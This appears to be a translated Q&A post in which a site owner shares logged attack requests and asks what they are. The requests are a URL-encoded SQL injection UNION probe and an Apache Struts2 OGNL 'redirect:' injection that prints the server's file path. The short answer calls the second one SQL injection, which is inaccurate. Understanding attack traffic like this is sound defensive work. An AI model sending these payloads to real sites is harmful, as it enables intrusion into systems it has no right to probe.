Si tratta di un tentativo di hacking di un sito Web e, in tal caso, che cosa sta cercando di ottenere?

0

Recentemente ho visto alcune strane richieste fatte sul nostro sito, mi chiedo cosa potrebbero essere.

Di solito otteniamo i tentativi di iniezione sql in questo modo:

1111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CH

Anche se non sono esperto, capisco vagamente la sostanza di ciò che sta accadendo lì.

Ma di recente ho iniziato a notare quelli come questo:

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().g'etRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()} 

Non ho mai visto nulla di simile prima. L'ho cercato su google e sembra correlato ai puntini di Apache, ma non ho compreso appieno la maggior parte dei risultati (vedi foto sotto).

Non sono troppo sicuro dei tag per questa domanda - se possono essere migliorati, per favore fallo. Grazie.

    
posta Martin Hansen Lennox 12.05.2015 - 22:55
fonte

1 risposta

4

Sembra che qualcuno stia tentando di sfruttare una vulnerabilità di SQL injection nei puntoni2 per eseguire l'esecuzione di codice in modalità remota. Vedi link

    
risposta data 12.05.2015 - 23:19
fonte

Leggi altre domande sui tag